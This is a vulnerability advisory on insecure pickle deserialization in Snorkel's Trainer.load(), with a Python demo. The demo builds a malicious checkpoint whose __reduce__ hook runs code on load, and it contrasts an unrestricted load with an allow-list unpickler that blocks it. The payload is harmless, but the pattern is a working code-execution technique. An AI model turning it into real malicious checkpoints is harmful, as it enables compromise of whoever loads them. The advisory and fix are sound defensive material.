Snorkel Library Insecure Deserialization Vulnerability in Trainer.load() Method Allowing Arbitrary Code Execution
Vulnerability
An insecure deserialization vulnerability has been identified in the Snorkel library, affecting versions up to and including 0.10.0. The Trainer.load() method loads model checkpoint files with torch.load() without passing the restrictive weights_only=True parameter. Without that restriction torch.load() falls back to the full Python pickle protocol, so a checkpoint can name arbitrary importable callables that the unpickler resolves and invokes while the file is being read. An attacker who can supply a crafted checkpoint file (for example, a model shared through a public download link or registry) can therefore obtain arbitrary code execution on the victim's system as soon as the file is loaded through the vulnerable method.
Impact
Exploitation of this vulnerability allows arbitrary code execution with the privileges of the process that calls Trainer.load() on the attacker-supplied checkpoint.
Remediation
Users should update to Snorkel version 0.10.1 or later, where this vulnerability has been addressed. Until the upgrade is in place, only load checkpoint files obtained from trusted sources.
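The following added example is not Snorkel's code; it reproduces the mechanism behind the issue and the fix with the standard library alone, so it runs without torch installed. A crafted "checkpoint" carries a pickle whose __reduce__ hook makes the unpickler call a global (here builtins.exec with a constructed, harmless payload that only sets an environment variable; a real payload would call os.system). The unrestricted load, which behaves like torch.load() without weights_only=True, runs it; the allow-list unpickler, which is the same idea torch applies when weights_only=True is set, refuses to resolve the global before anything executes. The names MARKER, BENIGN_STATE, MaliciousPayload and RestrictedUnpickler are constructed for this example.

```python
import builtins
import io
import os
import pickle
from collections import OrderedDict

# Constructed marker: the demo payload sets this environment variable instead
# of running a shell command, so the effect is observable but harmless.
MARKER = "SNORKEL_DEMO_PWNED"

# Constructed stand-in for a legitimate checkpoint: a state dict whose tensors
# are replaced by plain lists so the example runs without torch installed.
BENIGN_STATE = OrderedDict([("linear.weight", [0.1, -0.2]), ("linear.bias", [0.0])])


class MaliciousPayload:
    """Attacker-controlled object. pickle records the callable returned by
    __reduce__, and the unpickler invokes it with the given arguments on load.
    A real payload would return os.system with a shell command here."""

    def __reduce__(self):
        return (builtins.exec, (f"import os; os.environ[{MARKER!r}] = '1'",))


def build_benign_checkpoint() -> bytes:
    return pickle.dumps(BENIGN_STATE)


def build_malicious_checkpoint() -> bytes:
    return pickle.dumps(MaliciousPayload())


def vulnerable_load(data: bytes):
    """Mirrors torch.load(path) without weights_only: a full, unrestricted
    unpickle that resolves and calls any global the stream names."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Allow-list unpickler: only the globals a plain state dict needs may be
    resolved. torch's weights_only=True applies the same idea with its own
    allow-list of tensor and storage types (that implementation is not shown)."""

    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            f"refusing to resolve global {module}.{name} from checkpoint"
        )


def safe_load(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def vulnerable_load_triggers_payload() -> bool:
    """True if loading the crafted file the vulnerable way ran the payload."""
    os.environ.pop(MARKER, None)
    vulnerable_load(build_malicious_checkpoint())
    return os.environ.get(MARKER) == "1"


def safe_load_blocks_payload() -> bool:
    """True if the restricted loader rejects the file before any code runs."""
    os.environ.pop(MARKER, None)
    try:
        safe_load(build_malicious_checkpoint())
    except pickle.UnpicklingError:
        return MARKER not in os.environ
    return False


if __name__ == "__main__":
    print("benign checkpoint via safe_load:", safe_load(build_benign_checkpoint()))
    print("vulnerable load ran payload:", vulnerable_load_triggers_payload())
    print("restricted load blocked payload:", safe_load_blocks_payload())
```

Two practical checks follow from this. First, an allow-list fails closed: the benign state dict still loads, and the crafted file is rejected at find_class, before the unpickler reaches the REDUCE opcode that would call the payload. Second, a wrapper that calls torch.load(path, weights_only=True) only protects callers that go through it; any other code path in the same application that still calls torch.load() with the default, or passes weights_only=False explicitly, remains exposed, so the checkpoint files themselves must still be treated as untrusted input.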
